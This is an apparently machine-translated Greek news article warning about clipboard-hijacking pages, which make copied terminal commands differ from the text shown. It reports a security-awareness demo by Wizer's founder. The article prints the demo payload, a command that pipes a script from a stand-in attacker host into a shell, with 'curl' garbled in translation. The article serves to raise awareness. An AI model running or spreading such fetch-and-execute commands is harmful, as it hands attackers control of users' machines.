- Όλοι κάνουμε αντιγραφή και επικόλληση από το διαδίκτυο σε καθημερινή βάση χωρίς να γνωρίζουμε πραγματικά τους κινδύνους.
- Ένας ειδικός σε θέματα ασφάλειας αφιέρωσε χρόνο για να δείξει σε όλους το χειρότερο σενάριο όταν το έκανε αυτό.
- Η επικόλληση εντολών που λάβατε από το Διαδίκτυο στο τερματικό σας είναι ένας γρήγορος τρόπος για να παραβιαστείτε
- Οι εντολές που νομίζατε ότι επικολλάτε στο τερματικό σας είναι στην πραγματικότητα κακόβουλοι κωδικοί.
Είναι αλήθεια ότι ζούμε σε μια εποχή όπου η ταχύτητα είναι το παν, και το μόνο που έχει σημασία είναι η λήψη γρήγορων αποτελεσμάτων. Ωστόσο, λίγοι άνθρωποι σταματούν για ένα δευτερόλεπτο και σκέφτονται τις επιπτώσεις.
Σε καθημερινή βάση, εκατομμύρια προγραμματιστές, διαχειριστές και ερευνητές ασφαλείας εκτελούν απλές εργασίες, όπως αντιγραφή και επικόλληση εντολών από ιστοσελίδες απευθείας σε κονσόλες στον υπολογιστή τους.
Αν και πολλοί δεν το σκέφτονται καν για δεύτερη φορά, οι συνέπειες είναι μεγαλύτερες και πιο επικίνδυνες από ό, τι νομίζετε στην αρχή, ειδικά εάν αποθηκεύετε ευαίσθητα ή πολύτιμα δεδομένα.
Ένας γνωστός ειδικός σε θέματα ασφάλειας βρήκε χρόνο για να μοιραστεί τι θα μπορούσε να συμβεί στην πραγματικότητα εάν κάνετε αντιγραφή+επικόλληση περιεχομένου από ιστοσελίδες.
Η Αντιγραφή+Επικόλληση είναι ένας εύκολος τρόπος για να χακάρετε
Ο Gabriel Friedlander, ο οποίος είναι ο ιδρυτής της εκπαιδευτικής πλατφόρμας ευαισθητοποίησης για την ασφάλεια Wizer, έβγαλε το εξώφυλλο από ένα σχέδιο που θα σας κάνει να σκεφτείτε δύο φορές πριν αντιγράψετε και επικολλήσετε εντολές από ιστοσελίδες.
Η αντιγραφή και επικόλληση περιεχομένου από το Διαδίκτυο έχει γίνει τόσο συνηθισμένη στις μέρες μας, που κανείς δεν το σκέφτεται.
Ωστόσο, ο Friedlander προειδοποιεί ότι ορισμένες ιστοσελίδες είναι πιο απατηλές από ό, τι θα μπορούσε κανείς να καταλάβει στην αρχή και αυτό που πιστεύετε ότι αντιγράψατε είναι πολύ διαφορετικό από αυτό που κάνατε στην πραγματικότητα.
Και το χειρότερο σε όλα αυτά είναι ότι, χωρίς την απαραίτητη γνώση ή καθοδήγηση, τα θύματα συνειδητοποιούν το λάθος τους μόνο αφού επικολλήσουν το κείμενο, οπότε μπορεί να είναι ήδη πολύ αργά.
Ο αναλυτής ασφαλείας επινόησε επίσης ένα μικρό τεστ για τους αναγνώστες του ιστολογίου του, απλώς για να καταλάβουν οι άνθρωποι πόσο εύκολο είναι για εσάς να ανοίξετε ακούσια την πόρτα για τους εγκληματίες του κυβερνοχώρου.
Παρείχε μια εντολή που προορίζεται να αντιγραφεί, αλλά η σχετική αλήθεια αποκαλύπτεται μόνο όταν επικολλήσετε το κείμενο και δείτε τι εισαγάγατε πραγματικά στη ρύθμιση σας.
Αφού αντιγράψετε την εντολή που φαίνεται στο παραπάνω στιγμιότυπο οθόνης, το αποτέλεσμα της επικόλλησής της θα σας σοκάρει, καθώς απέχει πολύ από αυτό που νομίζατε ότι αντιγράφατε.
μπούκλα http://attacker-domain: 8000/shell.sh | SHΕκτός από την εντελώς διαφορετική εντολή που υπάρχει στο πρόχειρό σας, ο χαρακτήρας νέας γραμμής (ή επιστροφής) στο το τέλος του σημαίνει ότι το παραπάνω παράδειγμα θα εκτελεστεί αμέσως μόλις επικολληθεί απευθείας σε ένα Linux τερματικό.
Επομένως, καλύτερα να γνωρίζετε τι πραγματικά συμβαίνει και να το αντιμετωπίζετε ως σοβαρό κίνδυνο για την ασφάλεια. Δεν λέμε ότι όλοι οι ιστότοποι κρύβουν κακόβουλο περιεχόμενο, αλλά αξίζει να το λάβετε υπόψη.
Σας έχουν δεχτεί ποτέ χακάρισμα από την επικόλληση dodgy εντολών στο τερματικό σας; Μοιραστείτε την εμπειρία σας μαζί μας στην παρακάτω ενότητα σχολίων.
![5+ καλύτερο λογισμικό anti keylogger [Windows 10 & Mac]](/f/89a1bf90cbb3e7fcdbcbcb0e1b8d6eef.jpg?width=300&height=460)